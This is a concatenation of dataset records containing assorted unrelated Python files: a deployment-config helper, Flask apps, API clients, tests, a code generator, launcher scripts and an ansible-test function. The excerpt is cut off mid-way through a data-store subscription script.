self._collect_images(resource)\n if image_auth:\n username = image_auth['user']\n password = image_auth['token']\n else:\n username = None\n password = None\n for image in images:\n if image_patterns and \\\n not any(image.startswith(p) for p in image_patterns):\n error = True\n logging.error(\n f\"{error_prefix} Image is not in imagePatterns: {image}\")\n try:\n valid = Image(image, username=username, password=password)\n if not valid:\n error = True\n logging.error(\n f\"{error_prefix} Image does not exist: {image}\")\n continue\n except Exception:\n error = True\n logging.error(f\"{error_prefix} Image is invalid: {image}\")\n continue\n return error\n\n def _initiate_github(self, saas_file):\n auth = saas_file.get('authentication') or {}\n auth_code = auth.get('code') or {}\n if auth_code:\n token = secret_reader.read(auth_code, settings=self.settings)\n else:\n # use the app-sre token by default\n default_org_name = 'app-sre'\n config = get_config(desired_org_name=default_org_name)\n token = config['github'][default_org_name]['token']\n\n base_url = os.environ.get('GITHUB_API', 'https://api.github.com')\n return Github(token, base_url=base_url)\n\n def _initiate_image_auth(self, saas_file):\n auth = saas_file.get('authentication') or {}\n auth_image = auth.get('image') or {}\n if auth_image:\n creds = \\\n secret_reader.read_all(auth_image, settings=self.settings)\n else:\n creds = None\n return creds\n\n def populate_desired_state(self, ri):\n threaded.run(self.populate_desired_state_saas_file,\n self.saas_files,\n self.thread_pool_size,\n ri=ri)\n\n def populate_desired_state_saas_file(self, saas_file, ri):\n saas_file_name = saas_file['name']\n logging.debug(f\"populating desired state for {saas_file_name}\")\n github = self._initiate_github(saas_file)\n image_auth = self._initiate_image_auth(saas_file)\n managed_resource_types = saas_file['managedResourceTypes']\n image_patterns = saas_file['imagePatterns']\n resource_templates = saas_file['resourceTemplates']\n saas_file_parameters = self._collect_parameters(saas_file)\n # iterate over resource templates (multiple per saas_file)\n for rt in resource_templates:\n rt_name = rt['name']\n url = rt['url']\n path = rt['path']\n hash_length = rt.get('hash_length') or self.settings['hashLength']\n parameters = self._collect_parameters(rt)\n\n consolidated_parameters = {}\n consolidated_parameters.update(saas_file_parameters)\n consolidated_parameters.update(parameters)\n\n # iterate over targets (each target is a namespace)\n for target in rt['targets']:\n cluster, namespace = \\\n self._get_cluster_and_namespace(target)\n process_template_options = {\n 'saas_file_name': saas_file_name,\n 'resource_template_name': rt_name,\n 'url': url,\n 'path': path,\n 'hash_length': hash_length,\n 'target': target,\n 'parameters': consolidated_parameters,\n 'github': github\n }\n resources, html_url = \\\n self._process_template(process_template_options)\n if resources is None:\n ri.register_error()\n continue\n # add desired resources\n for resource in resources:\n resource_kind = resource['kind']\n if resource_kind not in managed_resource_types:\n continue\n # check images\n check_images_options = {\n 'saas_file_name': saas_file_name,\n 'resource_template_name': rt_name,\n 'html_url': html_url,\n 'resource': resource,\n 'image_auth': image_auth,\n 'image_patterns': image_patterns\n }\n image_error = self._check_images(check_images_options)\n if image_error:\n ri.register_error()\n continue\n resource_name = resource['metadata']['name']\n oc_resource = OR(\n resource,\n self.integration,\n self.integration_version,\n caller_name=saas_file_name,\n error_details=html_url)\n ri.add_desired(\n cluster,\n namespace,\n resource_kind,\n resource_name,\n oc_resource\n )\n\n def get_moving_commits_diff(self, dry_run):\n results = threaded.run(self.get_moving_commits_diff_saas_file,\n self.saas_files,\n self.thread_pool_size,\n dry_run=dry_run)\n return [item for sublist in results for item in sublist]\n\n def get_moving_commits_diff_saas_file(self, saas_file, dry_run):\n saas_file_name = saas_file['name']\n instace_name = saas_file['instance']['name']\n github = self._initiate_github(saas_file)\n trigger_specs = []\n for rt in saas_file['resourceTemplates']:\n rt_name = rt['name']\n url = rt['url']\n for target in rt['targets']:\n # don't trigger if there is a linked upstream job\n if target.get('upstream'):\n continue\n ref = target['ref']\n get_commit_sha_options = {\n 'url': url,\n 'ref': ref,\n 'github': github\n }\n desired_commit_sha = \\\n self._get_commit_sha(get_commit_sha_options)\n # don't trigger on refs which are commit shas\n if ref == desired_commit_sha:\n continue\n namespace = target['namespace']\n cluster_name = namespace['cluster']['name']\n namespace_name = namespace['name']\n env_name = namespace['environment']['name']\n key = f\"{saas_file_name}/{rt_name}/{cluster_name}/\" + \\\n f\"{namespace_name}/{env_name}/{ref}\"\n current_commit_sha = self.state.get(key, None)\n # skip if there is no change in commit sha\n if current_commit_sha == desired_commit_sha:\n continue\n # don't trigger if this is the first time\n # this target is being deployed.\n # that will be taken care of by\n # openshift-saas-deploy-trigger-configs\n if current_commit_sha is None:\n # store the value to take over from now on\n if not dry_run:\n self.state.add(key, value=desired_commit_sha)\n continue\n # we finally found something we want to trigger on!\n job_spec = {\n 'saas_file_name': saas_file_name,\n 'env_name': env_name,\n 'instance_name': instace_name,\n 'rt_name': rt_name,\n 'cluster_name': cluster_name,\n 'namespace_name': namespace_name,\n 'ref': ref,\n 'commit_sha': desired_commit_sha\n }\n trigger_specs.append(job_spec)\n\n return trigger_specs\n\n def update_moving_commit(self, job_spec):\n saas_file_name = job_spec['saas_file_name']\n env_name = job_spec['env_name']\n rt_name = job_spec['rt_name']\n cluster_name = job_spec['cluster_name']\n namespace_name = job_spec['namespace_name']\n ref = job_spec['ref']\n commit_sha = job_spec['commit_sha']\n key = f\"{saas_file_name}/{rt_name}/{cluster_name}/\" + \\\n f\"{namespace_name}/{env_name}/{ref}\"\n self.state.add(key, value=commit_sha, force=True)\n\n def get_configs_diff(self):\n results = threaded.run(self.get_configs_diff_saas_file,\n self.saas_files,\n self.thread_pool_size)\n return [item for sublist in results for item in sublist]\n\n def get_configs_diff_saas_file(self, saas_file):\n saas_file_name = saas_file['name']\n saas_file_parameters = saas_file.get('parameters')\n instace_name = saas_file['instance']['name']\n trigger_specs = []\n for rt in saas_file['resourceTemplates']:\n rt_name = rt['name']\n rt_parameters = rt.get('parameters')\n for desired_target_config in rt['targets']:\n namespace = desired_target_config['namespace']\n cluster_name = namespace['cluster']['name']\n namespace_name = namespace['name']\n env_name = namespace['environment']['name']\n # add parent parameters to target config\n desired_target_config['saas_file_parameters'] = \\\n saas_file_parameters\n desired_target_config['rt_parameters'] = rt_parameters\n # get current target config from state\n key = f\"{saas_file_name}/{rt_name}/{cluster_name}/\" + \\\n f\"{namespace_name}/{env_name}\"\n current_target_config = self.state.get(key, None)\n # skip if there is no change in target configuration\n if current_target_config == desired_target_config:\n continue\n job_spec = {\n 'saas_file_name': saas_file_name,\n 'env_name': env_name,\n 'instance_name': instace_name,\n 'rt_name': rt_name,\n 'cluster_name': cluster_name,\n 'namespace_name': namespace_name,\n 'target_config': desired_target_config\n }\n trigger_specs.append(job_spec)\n\n return trigger_specs\n\n def update_config(self, job_spec):\n saas_file_name = job_spec['saas_file_name']\n env_name = job_spec['env_name']\n rt_name = job_spec['rt_name']\n cluster_name = job_spec['cluster_name']\n namespace_name = job_spec['namespace_name']\n target_config = job_spec['target_config']\n key = f\"{saas_file_name}/{rt_name}/{cluster_name}/\" + \\\n f\"{namespace_name}/{env_name}\"\n self.state.add(key, value=target_config, force=True)\n","sub_path":"utils/saasherder.py","file_name":"saasherder.py","file_ext":"py","file_size_in_byte":20658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"593147588","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 5 15:10:43 2015\n\n@author: Preto\n\"\"\"\n\nimport twilio\nimport twilio.rest\n \naccount_sid = \"\"\nauth_token = \"\"\n\n\ntry:\n client = twilio.rest.TwilioRestClient(account_sid, auth_token)\n \n message = client.messages.create(\n body=\"Alerta de Prueba.\",\n to=\"+34666666666\",\n from_=\"+1500000000\"\n )\n \nexcept twilio.TwilioRestException as e:\n print(e)\n \n","sub_path":"Twilio/twilio-sms.py","file_name":"twilio-sms.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"492953475","text":"#!/usr/bin/python 3.6\n# coding: utf-8\n#\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n# # #\n# # MESTRADO EM CIENCIAS DA COMPUTACAO #\n# # DISCIPLINA DE INTELIGÊNCIA ARTIFICIAL #\n# # Thiago Giroto Milani - 02/2017 #\n# # tmilani@rc.unesp.br #\n# # #\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n#\nnodes = {}\n\nif __name__ == \"__main__\":\n with open(\"coordenadas.txt\") as arquivo:\n linha = arquivo.readline()\n while (linha != \"\"):\n # PEGA NODE VIZINHOS DO NODE ATUAL\n vizinhos = linha.split(\";\")[1]\n # SEPARA CADA TUPLA DE DISTANCIA DO NODE\n lista_vizinhos = vizinhos.split(\",\")\n tupla_viz = []\n for i in range(len(lista_vizinhos)):\n vizinho = str(lista_vizinhos[i]).rstrip(\"\\n\")\n #PEGA O NODE E A DISTANCIA DO NO ATUAL\n tupla_viz.append((vizinho.split(\" \")[0],vizinho.split(\" \")[1])) \n nodes[linha.split(\";\")[0]] = tupla_viz \n linha = arquivo.readline()\n \n pilha = []\n caminho = []\n #INICIA O NODE\n pilha.append(\"i\")\n while pilha[0][0] != \"f\":\n print(\"Pilha \",pilha,\"\\n\")\n # REMOVE O ULTIMO ELEMENTO DA PILHA\n caminho.append(pilha.pop(0))\n print(\"Expandindo a pilha \",caminho[-1][0])\n if nodes.get(caminho[-1][0]) == None:\n caminho.pop(-1)\n print(\"Fim do Caminho\")\n else:\n for i in range(len(nodes.get(caminho[-1][0]))):\n #SELECIONA A PILHA DE VIZINHOS\n pilha.append(nodes.get(caminho[-1][0])[i])\n pilha = sorted(pilha, key=lambda pilha: pilha[1])\n caminho.append(pilha[0]) \n print(\"\\nCaminho até F: \",caminho) \n \n\n \n \n \n","sub_path":"Buscas IA/branch-and-bound.py","file_name":"branch-and-bound.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"580520179","text":"import os\nimport torch\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torch.nn.utils import clip_grad_norm\nfrom dataset import dataset_factory\nfrom model.model import Encoder, Decoder, Seq2Seq\nfrom util import cuda\n\n\ndef save_model(model, epoch, val_loss):\n if not os.path.isdir('.save'):\n os.makedirs('.save')\n torch.save(model.state_dict(), \".save/seq2seq-%d-%f.pt\" % (epoch, val_loss))\n\n\ndef evaluate(model, val_iter, vocab_size, padding_idx):\n model.eval() # put model in eval mode (this is important because of dropout)\n\n total_loss = 0\n for batch in val_iter:\n # calculate model predictions\n question, answer = cuda(batch.question), cuda(batch.answer)\n outputs = model(question, answer)\n\n # calculate batch loss\n loss = F.nll_loss(outputs.view(-1, vocab_size), answer[1:].view(-1),\n ignore_index=padding_idx) # answer[1:] skip token\n total_loss += loss.data[0]\n\n return total_loss / len(val_iter)\n\n\ndef train(model, optimizer, train_iter, vocab_size, grad_clip, padding_idx):\n model.train() # put model in train mode (this is important because of dropout)\n\n optimizer.zero_grad()\n total_loss = 0\n for batch in train_iter:\n # calculate model predictions\n question, answer = cuda(batch.question), cuda(batch.answer)\n outputs = model(question, answer)\n\n # calculate loss and backpropagate errors\n loss = F.nll_loss(outputs.view(-1, vocab_size), answer[1:].view(-1),\n ignore_index=padding_idx) # answer[1:] skip token\n loss.backward()\n\n total_loss += loss.data[0]\n\n # clip gradients to avoid exploding gradient\n clip_grad_norm(model.parameters(), grad_clip)\n\n # update parameters\n optimizer.step()\n\n return total_loss / len(train_iter)\n\n\ndef main():\n vocab, train_iter, val_iter, test_iter = dataset_factory('twitter-customer-support')\n\n epochs = 100\n embedding_size = 20\n hidden_size = 100\n vocab_size = len(vocab)\n padding_idx = vocab.stoi['']\n\n encoder = Encoder(vocab_size, embedding_size, hidden_size)\n decoder = Decoder(vocab_size, embedding_size, hidden_size)\n seq2seq = cuda(Seq2Seq(encoder, decoder, vocab_size))\n\n optimizer = optim.Adam(seq2seq.parameters())\n\n best_val_loss = None\n for epoch in range(epochs):\n # calculate train and val loss\n train_loss = train(seq2seq, optimizer, train_iter, vocab_size, 5, padding_idx)\n val_loss = evaluate(seq2seq, val_iter, vocab_size, padding_idx)\n print(\"[Epoch=%d] train_loss %f - val_loss %f\" % (epoch, train_loss, val_loss))\n\n # save model if model achieved best val loss\n if not best_val_loss or val_loss < best_val_loss:\n print('Saving model...')\n save_model(seq2seq, epoch, val_loss)\n best_val_loss = val_loss\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"336401461","text":"\nfrom gen_utils import *\nfrom allcharset import *\n\nif 1:\n #random.shuffle(fontfiles)\n #fontfiles = fontfiles[:200] + ['huawenxihei.ttf', 'fz-v4.0.ttf']\n outpath = 'D:/OCR_Line/lines/han200w'\n\n\ndef savelines(labels, outtxt):\n f = open(outtxt, 'w')\n for s in labels:\n # print(s)\n f.write(s+'\\n')\n f.close()\n\n\n\ndef loadlines(txtfn):\n f = open(txtfn, 'r')\n labels = f.readlines()\n f.close()\n for i in range(0, len(labels)):\n aa = labels[i]\n bb = aa.split(\" \")[0:-1]\n cc = \" \".join(bb)\n labels[i] = cc\n return labels\n\nimgoutpath = outpath+'/img'\nroot = outpath + '/'\n\nlabels = loadlines(root + '/infos.txt')\nif 1:\n\tcount = len(labels)\n\tcount_train = int(count*0.8)\n\n\troot = outpath + '/'\n\touttxt = root+'list.txt'\n\tsavelines(labels[:count_train], root+'train.txt')\n\tsavelines(labels[count_train:], root+'test.txt')\n\n\tlabels = ['blank']\n\n","sub_path":"include/ocr/train/chinese_fonts/shuffle.py","file_name":"shuffle.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"98443776","text":"import os\nimport json\nfrom random import sample\n\nfrom flask import render_template, request\n\nfrom app import app, redis_conn\nfrom app.docker.run_docker import run_docker_script\n\nCARDS_HASH_NAME = '_cards'\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/random')\ndef random():\n cards = {}\n cards_path = os.path.join(app.static_folder, 'resources', 'cards.json')\n with open(cards_path) as raw_cards:\n cards = json.load(raw_cards)\n\n result = [cards[i] for i in sample(range(len(cards)), 3)]\n\n return {'cards': result}\n\n\n@app.route('/create_container')\ndef create_container():\n res = run_docker_script()\n\n return {'container_id': res}\n\n\n@app.route('/load_cards')\ndef load_cards():\n cards_path = os.path.join(app.static_folder, 'resources', 'cards.json')\n with open(cards_path) as raw_cards:\n cards = json.load(raw_cards)\n\n [redis_conn.hset(CARDS_HASH_NAME, card['title'],\n json.dumps(card['effects'])) for card in cards]\n\n return 'OK'\n\n\n@app.route('/redis', methods=['GET'])\ndef redis_get():\n if request.args.get('cards'):\n raw_cards = redis_conn.hgetall(CARDS_HASH_NAME)\n presentable = []\n\n for k, v in raw_cards.items():\n presentable.append({k: json.loads(v)})\n return {\n 'result': presentable\n }\n\n key = request.args.get('key')\n value = redis_conn.get(key)\n\n return {\n 'result': value.decode(\"utf-8\").strip()\n }\n\n\n@app.route('/redis', methods=['POST'])\ndef redis_set():\n key = request.json['key']\n value = request.json['value']\n redis_conn.set(key, value)\n\n return {\n 'result': f'set {key}={value}'\n }\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"386015588","text":"from PIL import Image\nimport cv2 \nfrom .config import ServerConfig\nfrom .utils import cv2ToBytes, pilToBytes\nfrom .structs import SceneResponse\nimport requests\nimport os\nimport validators\nimport numpy\n\nclass SceneRecognition(object):\n def __init__(self,config: ServerConfig):\n self.config = config\n\n def __process_image(self,image_data: bytes):\n response = requests.post(self.config.server_url+\"v1/vision/scene\",\n files={\"image\": image_data},\n data={\"api_key\": self.config.api_key}\n )\n\n return response\n\n \n def processImage(self, image,format=\"jpg\", callback=None):\n if isinstance(image,str):\n if os.path.isfile(image):\n image_data = open(image,\"rb\").read()\n elif validators.url(image):\n image_data = requests.get(image).content\n else:\n raise Exception(\"String input is neigther a file nor a url\")\n elif isinstance(image,numpy.ndarray):\n image_data = cv2ToBytes(image,format=format)\n elif isinstance(image,Image):\n image_data = pilToBytes(image,format=format)\n else:\n raise Exception(\"Unsupported input type: {}\".format(type(image)))\n\n response = self.__process_image(image_data)\n\n if response.status_code == 200:\n data = SceneResponse(response.json())\n if callback is not None:\n callback(image_data,data)\n return data\n elif response.status_code == 403:\n raise Exception(\"The scene endpoint is not enabled on the DeepStack server\")\n elif response.status_code == 400:\n raise Exception(\"Invalid image\")\n elif response.status_code == 500:\n raise Exception(\"An error occured on the DeepStack server\")\n else:\n raise Exception(\"Unknown error : {} occured\".format(response.status_code))\n\n\n\n \n\n","sub_path":"deepstack/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"295220843","text":"\"\"\"Tests for PyDaymet package.\"\"\"\nimport io\n\nimport pytest\nfrom shapely.geometry import Polygon\n\nimport pydaymet as daymet\n\n\n@pytest.fixture\ndef geometry():\n return Polygon(\n [[-69.77, 45.07], [-69.31, 45.07], [-69.31, 45.45], [-69.77, 45.45], [-69.77, 45.07]]\n )\n\n\n@pytest.fixture\ndef dates():\n return (\"2000-01-01\", \"2000-01-12\")\n\n\n@pytest.fixture\ndef variables():\n return [\"tmin\"]\n\n\ndef test_byloc(dates, variables):\n coords = (-1431147.7928, 318483.4618)\n crs = \"epsg:3542\"\n\n daymet.get_byloc(coords, dates, crs=crs)\n st_p = daymet.get_byloc(coords, dates, crs=crs, variables=variables, pet=True)\n yr_p = daymet.get_byloc(coords, 2010, crs=crs, variables=variables)\n assert (\n abs(st_p.iloc[10][\"pet (mm/day)\"] - 2.393) < 1e-3\n and abs(yr_p.iloc[10][\"tmin (deg c)\"] - 11.5) < 1e-1\n )\n\n\ndef test_bygeom(geometry, dates, variables):\n daymet.get_bygeom(geometry, dates)\n daymet.get_bygeom(geometry.bounds, dates)\n st_g = daymet.get_bygeom(geometry, dates, variables=variables, pet=True)\n yr_g = daymet.get_bygeom(geometry, 2010, variables=variables)\n assert (\n abs(st_g.isel(time=10, x=5, y=10).pet.values.item() - 0.596) < 1e-3\n and abs(yr_g.isel(time=10, x=5, y=10).tmin.values.item() - (-18.0)) < 1e-1\n )\n\n\ndef test_show_versions():\n f = io.StringIO()\n daymet.show_versions(file=f)\n assert \"INSTALLED VERSIONS\" in f.getvalue()\n","sub_path":"tests/test_pydaymet.py","file_name":"test_pydaymet.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"449447677","text":"from __future__ import absolute_import\nfrom typing import List, Dict, Any, Optional\nfrom tinydb import TinyDB, Query\nfrom tinydb.operations import add, decrement, set\n\n\ndef takerank(x):\n return (int)(x[1])\n\n\ndb = TinyDB('data/list.json', indent=4)\nteamdata = Query()\nnow = db.all()\nteam = []\nfor i in now:\n team.append((\n i['chname'],\n i['rating'],\n ))\nteam.sort(key=takerank, reverse=True)\nfor i in team:\n print(f\"{i[0]} {i[1]}\")","sub_path":"showrating.py","file_name":"showrating.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"28059349","text":"from flask import Flask,render_template,request,redirect\nfrom flask_sqlalchemy import SQLAlchemy\nimport test\nimport math as m\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = \"sqlite:///file.db\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\nclass Detections(db.Model):\n sno = db.Column(db.Integer,primary_key=True)\n glucose = db.Column(db.Integer,nullable=False)\n bp = db.Column(db.Integer,nullable=False)\n insulin = db.Column(db.Integer,nullable=False)\n bmi = db.Column(db.Float,nullable=False)\n age = db.Column(db.Integer,nullable=False)\n prob = db.Column(db.Integer,nullable=False)\n \n\n def __repr__(self) -> str:\n return f\"{self.sno} - {self.age}\"\n\n@app.route(\"/\",methods=['GET','POST'])\ndef detect():\n if request.method == \"POST\":\n glucose = int(request.form['glucose'])\n bp = int(request.form['bp'])\n insulin = int(request.form['insulin'])\n bmi = float(request.form['bmi'])\n age = int(request.form['age'])\n print(glucose,bp,insulin,bmi,age)\n prob = int(m.ceil((test.predict([[glucose,bp,insulin,bmi,age]])*100)))\n result = Detections(glucose=glucose,bp=bp,insulin=insulin,bmi=bmi,age=age,prob=prob)\n db.session.add(result)\n db.session.commit()\n return render_template('results.html',prob=prob)\n return render_template('detect.html')\n\n@app.route(\"/detections\")\ndef detections():\n p = Detections.query.all()\n return render_template('detections.html',p=p)\n\n'''@app.route(\"/results\")\ndef results():\n p = Detections.query.all()\n return render_template('detections.html',p=p)'''\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"638703611","text":"from app.utils.Util import source_code, required, ext_point, get_file_name, get_name, get_attr, is_ref, lowercase_first_letter\nfrom app.utils.FileUtil import FileUtil\n\nclass AppForm(object):\n\n def __init__(self, path, project, source_obj, template_data):\n self.path = path\n self.project = project\n self.source_obj = source_obj\n self.template_data = template_data\n self.file = get_file_name(self.source_obj['table']) + \".form.ts\"\n\n def proceed(self):\n path = self.path+self.file\n print(path);\n is_exists = FileUtil.is_exists(path);\n if is_exists:\n return False\n else:\n return True\n\n\n def final(self):\n template_file = FileUtil.template('angular', 'AppForm')\n output = source_code(self.template_data, template_file)\n print(\"-------------------------------------------------\")\n print(output)\n FileUtil.write_file(self.path, self.file, output);\n print(\"-------------------------------------------------\")\n\n\n def start(self):\n self.template_data['name'] = get_name(self.source_obj['table'])\n self.template_data['props'] = []\n print(self.template_data)\n\n def main(self):\n print(self.source_obj['props'])\n self.props_loop(self.template_data['attr']+'_', self.source_obj['props'])\n\n def main(self):\n props = self.source_obj['props']\n for item in props:\n self.service(item, self.template_data['name']+'_')\n\n def service(self, item, ext):\n if (is_ref(item['type'])):\n if (item['html'] == 'form' ):\n self.ref_service( item, ext)\n else:\n self.prop_service(self.template_data['props'], item, ext)\n\n def prop_service(self, source_arr, item, ext):\n if (item['name'].lower() == 'updatedby' or item['name'].lower() == 'updatedon'):\n return\n data = self.service_ext(item, ext)\n if data is not None:\n source_arr.append(data)\n\n def ref_service(self, item, ext):\n ext_source_obj = FileUtil.project_file(self.project, item['type'])\n for item in ext_source_obj['props']:\n self.service(item, ext+ext_source_obj['name']+'_')\n\n def service_ext(self, item, ext):\n if item['html'] == 'text' \\\n or item['html'] == 'number' \\\n or item['html'] == 'select' \\\n or item['html'].lower() == 'date':\n data = {'name': item['name']}\n data['extn'] = (ext + data['name']).lower()\n if item['type'] == 'string':\n data['validators'] = \"this.TYPE_DATA\"\n elif item['type'] == 'number':\n data['validators'] = \"this.TYPE_NUMBER\"\n else:\n data['validators'] = \"this.TYPE_ALL\"\n\n if item['length'] is not None:\n data['maxLength'] = item['length']\n else:\n data['maxLength'] = '15'\n return data\n else:\n return None","sub_path":"app/angular/exec/AppForm.py","file_name":"AppForm.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"317176345","text":"#!/usr/bin/python3\nfrom platform import python_version\nimport subprocess\nimport time\nimport logging\nimport argparse\n\ndef xstr(s):\n return '' if s is None else str(s)\n\nnumeric_log_level = logging.INFO\nparser = argparse.ArgumentParser(description='Optional app description')\nparser.add_argument('--log', help='DEBUG or INFO or WARNING or ERROR or CRITICAL')\nargs = parser.parse_args()\nprint(\"commandline --log parameter: '\" + xstr(args.log) + \"'\")\nif isinstance(args.log, str):\n\tnumeric_log_level = getattr(logging, args.log.upper(), None)\n\tif not isinstance(numeric_log_level, int):\n\t\tnumeric_log_level = logging.INFO\n\n#print(numeric_log_level)\nlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=numeric_log_level,\n\thandlers=[logging.FileHandler(\"startBothTws.py.log\"),\n\t\t\tlogging.StreamHandler()])\n\nlogging.info(\"***** START *****\")\nlogging.info(\"Python version: \" + python_version())\n\nlogging.info(\"DcMain TWS: starting in a parallel subprocess.\");\nsubprocess.call(['/home/sq-vnc-client/opt/ibc/twsstartDcMain.sh'])\nlogging.info(\"DcMain TWS: started. Now sleep 100sec (50s may not enough)...\")\ntime.sleep(100)\n\nlogging.info(\"DeBlanzac TWS: starting in a parallel subprocess.\");\nsubprocess.call(['/home/sq-vnc-client/opt/ibc/twsstartDeBlanzac.sh'])\nlogging.info(\"***** END *****\");\n","sub_path":"admin/Linux/startBothTws.py","file_name":"startBothTws.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"23186049","text":"\n\ndef command_integration_role(args, target, start_at_task, test_dir, inventory_path, temp_path):\n '\\n :type args: IntegrationConfig\\n :type target: IntegrationTarget\\n :type start_at_task: str | None\\n :type test_dir: str\\n :type inventory_path: str\\n :type temp_path: str\\n '\n display.info(('Running %s integration test role' % target.name))\n env_config = None\n vars_files = []\n variables = dict(output_dir=test_dir)\n if isinstance(args, WindowsIntegrationConfig):\n hosts = 'windows'\n gather_facts = False\n variables.update(dict(win_output_dir='C:\\\\ansible_testing'))\n elif isinstance(args, NetworkIntegrationConfig):\n hosts = target.name[:target.name.find('_')]\n gather_facts = False\n else:\n hosts = 'testhost'\n gather_facts = True\n cloud_environment = get_cloud_environment(args, target)\n if cloud_environment:\n env_config = cloud_environment.get_environment_config()\n with integration_test_environment(args, target, inventory_path) as test_env:\n if os.path.exists(test_env.vars_file):\n vars_files.append(os.path.relpath(test_env.vars_file, test_env.integration_dir))\n play = dict(hosts=hosts, gather_facts=gather_facts, vars_files=vars_files, vars=variables, roles=[target.name])\n if env_config:\n play.update(dict(vars=env_config.ansible_vars, environment=env_config.env_vars, module_defaults=env_config.module_defaults))\n playbook = json.dumps([play], indent=4, sort_keys=True)\n with named_temporary_file(args=args, directory=test_env.integration_dir, prefix=('%s-' % target.name), suffix='.yml', content=playbook) as playbook_path:\n filename = os.path.basename(playbook_path)\n display.info(('>>> Playbook: %s\\n%s' % (filename, playbook.strip())), verbosity=3)\n cmd = ['ansible-playbook', filename, '-i', os.path.relpath(test_env.inventory_path, test_env.integration_dir)]\n if start_at_task:\n cmd += ['--start-at-task', start_at_task]\n if args.tags:\n cmd += ['--tags', args.tags]\n if args.skip_tags:\n cmd += ['--skip-tags', args.skip_tags]\n if args.diff:\n cmd += ['--diff']\n if isinstance(args, NetworkIntegrationConfig):\n if args.testcase:\n cmd += ['-e', ('testcase=%s' % args.testcase)]\n if args.verbosity:\n cmd.append(('-' + ('v' * args.verbosity)))\n env = integration_environment(args, target, test_dir, test_env.inventory_path, test_env.ansible_config, env_config)\n cwd = test_env.integration_dir\n env['ANSIBLE_ROLES_PATH'] = os.path.abspath(os.path.join(test_env.integration_dir, 'targets'))\n module_coverage = ('non_local/' not in target.aliases)\n intercept_command(args, cmd, target_name=target.name, env=env, cwd=cwd, temp_path=temp_path, module_coverage=module_coverage)\n","sub_path":"Data Set/bug-fixing-1/d9c44897a61ad4252bf7cd07348e41d7de57824c--bug.py","file_name":"d9c44897a61ad4252bf7cd07348e41d7de57824c--bug.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"476309410","text":"#!/usr/bin/env python\n\nimport json\nimport argparse\nfrom httplib2 import Http\nfrom oauth2client.service_account import ServiceAccountCredentials\n\n\ndef prep_json(callback_base_url, query_json_file, query_param_token, hmac_key_id, hmac_key, attachments_file):\n with open(query_json_file) as f:\n query = json.load(f)\n\n if hmac_key_id is not None:\n print('Subscribing with hmac key')\n payload = {\n 'es_query': query,\n 'callback_url': callback_base_url,\n 'hmac_key_id': hmac_key_id,\n 'hmac_secret_key': hmac_key\n }\n else:\n print('Subscribing with query param token')\n payload = {\n 'es_query': query,\n 'callback_url': '{0}?auth={1}'.format(callback_base_url, query_param_token)\n }\n\n if attachments_file:\n with open(attachments_file) as f:\n attachments = json.load(f)\n payload['attachments'] = attachments\n\n return payload\n\n\ndef make_request(js, dss_url, key_file):\n scopes = ['https://www.googleapis.com/auth/userinfo.email']\n credentials = ServiceAccountCredentials.from_json_keyfile_name(key_file, scopes)\n h = credentials.authorize(Http())\n headers = {'Content-type': 'application/json'}\n response, content = h.request(dss_url, 'PUT', body=json.dumps(js), headers=headers)\n print(content)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-dss_url', help='Endpoint for creating new subscriptions in the storage service', required=True)\n parser.add_argument('-callback_base_url', help='Lira endpoint for receiving notifications', required=True)\n parser.add_argument('-key_file', help='JSON file containing storage service credentials', required=True)\n parser.add_argument('-query_json', help='JSON file containing the query to register', required=True)\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument('-hmac_key', help='HMAC key')\n group.add_argument('-query_param_token', help='Query param auth token')\n parser.add_argument('-hmac_key_id', help='Unique identifier for hmac key')\n parser.add_argument(\"--additional_metadata\",\n required=False,\n default=None,\n help='JSON file with additional fields to include in the notification')\n args = parser.parse_args()\n if args.hmac_key and not args.hmac_key_id:\n parser.error('You must specify hmac_key_id when you specify hmac_key')\n\n js = prep_json(\n args.callback_base_url,\n args.query_json,\n 